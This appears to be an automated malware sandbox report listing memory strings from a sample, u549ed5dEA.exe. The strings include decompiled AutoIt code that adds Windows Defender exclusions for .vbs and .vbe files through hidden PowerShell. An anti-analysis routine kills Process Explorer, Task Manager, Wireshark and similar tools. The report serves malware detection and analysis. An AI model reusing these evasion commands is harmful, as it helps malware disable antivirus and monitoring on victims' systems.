                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbs'", "", "", @sw_hide)
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '.vbe'", "", "", @sw_hide)
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbs'", "", "", @sw_hide)
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shellexecute("powershell", " powershell -command add-mppreference -exclusionextension '*.vbe'", "", "", @sw_hide)
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;endif
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>disabler
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: func antianalysis()
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process explorer") then
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("process explorer")
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp64.exe")
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("procexp.exe")
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endif
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("process hacker") then
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("process hacker")
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("processhacker.exe")
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("taskmgr.exe") then
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("taskmgr.exe")
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if processexists("regshot.exe") then
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("regshot.exe")
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("smartsniff") then
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("smartsniff")
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("wireshark") then
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("wireshark")
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if winexists("tcpeye") then
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: winclose("tcpeye")
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: processclose("tcpeye.exe")
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: endfunc ;==>antianalysis
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: v203h4fp31lpw870v7
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $_y0x3856f9c703e6af597b4b = 267 then ; x86 version
                Source: u549ed5dEA.exe, 00000000.00000003.2086851810.0000000007A90000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: if $_y0x3856f9c80ff2bc5f51660df0cdd6 then
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ,v^~;do,
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: /c:\p1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: users
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: users<
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .users
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: alfons
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: user>
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .user
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: v1dwsl
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: appdata
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: appdata@
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwsl(z]z.
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwsl(z]z.b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: bdgappdata
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: p1(z[z
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local<
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dwsl(z]z.v
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pdata
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: pdata@
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39180i
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39182e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39178[
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39184q
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39177w
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39179m
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39185c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39181y
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39186
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39183
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39123
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39187
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39188
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39189)
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39190/
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39191%
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: @propsys.dll,-39176
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: searches
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: camera roll
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: libraries
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: onedrive
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: document
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: documents
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: cd burning
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: local musicm
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: downloadsu
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: webhistoryy
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: picturesq
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: web history
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: webhistory
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: documents9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: hj(5w<
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: }d"pn
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\musicw
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\videose
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: known folder manager-
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: lmem
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: negoextenderindlmem p
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: desktop
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: desktop@
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: .desktop
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: [.shellclassinfo
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21769
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: iconresource%systemroot%\system32\imageres.dll,-183
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{d3162b92-9365-467a-956b-92703aca08af}
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: qspg%
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\microsoft\windows\inetcachez
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\programdata\microsoft\windows\start menu\programs\startup-
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\start menu>
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\libraries
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\local\microsoft\windows\inetcookies
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: x1dw(m
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: usersd
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: owh(z]z.
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: :nvmusers@shell32.dll,-21813
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: c:\users\user\appdata\roaming\microsoft\windows\recent
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: =9ncalrpc:[epmapper,security=impersonation dynamic false]
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: pc:\programdata\microsoft\windows\start menu\desktop.inimemstr_e3909893-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\desktop.inimemstr_b4d41d48-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\libraries\desktop.inimemstr_b99ab084-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programs\startup\desktop.inimemstr_972773ef-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\windows\network shortcuts\desktop.inimemstr_f822be8b-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programs\accessibility\desktop.inimemstr_b2f6e748-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programs\windows powershell\desktop.inimemstr_caa94329-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\programdata\microsoft\windows\start menu\programs\accessories\system tools\desktop.inimemstr_680496d4-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\appdata\roaming\microsoft\internet explorer\quick launch\desktop.inimemstr_2606f2df-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: documentsdmemstr_29840e99-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .documentsmemstr_c7c06cba-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturesmemstr_fa1ab7ba-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: picturesbmemstr_35485220-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .picturesmemstr_208bd579-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: shell:::{20d04fe0-3aea-1069-a2d8-08002b30309d}\::{f86fa3ab-70d2-4fc7-9c99-fcbf05467f3a}memstr_8e21f023-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: localizedresourcename@%systemroot%\system32\shell32.dll,-21770memstr_2bd947aa-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconresource%systemroot%\system32\imageres.dll,-112memstr_4302223a-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconfile%systemroot%\system32\shell32.dllmemstr_d815ee3c-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: iconindex-235memstr_33866cdc-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .iitdo.vbememstr_6bb136cd-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: d:p(a;oici;fa;;;ba)(a;oici;0x1200a9;;;iu)(a;oici;fa;;;sy)vmemstr_140d366d-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .appdatamemstr_8a32272b-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: roamingmemstr_6ea3ffbf-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: roaming@memstr_46c5ae91-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .roamingmemstr_c62ff409-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoftmemstr_0ebf1e58-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoftdmemstr_c7bc9b65-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .microsoftmemstr_ee4ba6f0-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windowsmemstr_811df3e6-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: windows@memstr_adaa5dcf-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .windowsmemstr_9e00163a-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: librariesdmemstr_4cd74666-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .librariesmemstr_b1a67d4e-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-181memstr_6301c5ba-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\application shortcutsmemstr_806ccc84-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-3lmemstr_d30065c3-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-183gmemstr_66ef55d5-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\downloads\desktop.inimmemstr_d92b407a-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-184smemstr_57195bce-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\documents\desktop.inimemstr_0dd87f0b-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\pictures\desktop.inimemstr_48b2c3a4-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-2/memstr_85d212c1-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\onedrive\desktop.ini5memstr_beedd963-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-6memstr_19a64147-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-113memstr_cb27ae1c-c
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-3memstr_c47659dd-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-198memstr_7e0862f3-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-115memstr_ef7c17ae-8
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dllmemstr_fb4eb53b-b
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-18memstr_a6b1026f-a
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-4memstr_fe86958c-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\windows\system32\windows.storage.dllmemstr_304fd495-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-108imemstr_62ad93b8-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-189dmemstr_aeb2a453-f
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-189_memstr_ff105baa-2
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-108jmemstr_02e7f629-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-5ememstr_2bed74f0-1
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-1pmemstr_ea9a727d-6
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-117memstr_1b99a2e2-4
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\contacts\desktop.inimemstr_2e6ddad6-7
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft\windows\devicemetadatastorememstr_4e691f23-d
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\searches\desktop.ini'memstr_6764968e-0
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: c:\users\user\favorites\desktop.ini2memstr_983251fa-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-3memstr_07393d13-9
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-185memstr_54d41fdd-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-184memstr_cc60b4cc-5
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\shell32.dll,-8memstr_c18c9216-3
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-112memstr_7343c6ec-e
                Source: u549ed5dEA.exe, 00000000.00000002.2249057094.0000000005255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %systemroot%\system32\imageres.dll,-186memstr_ea46c156-3
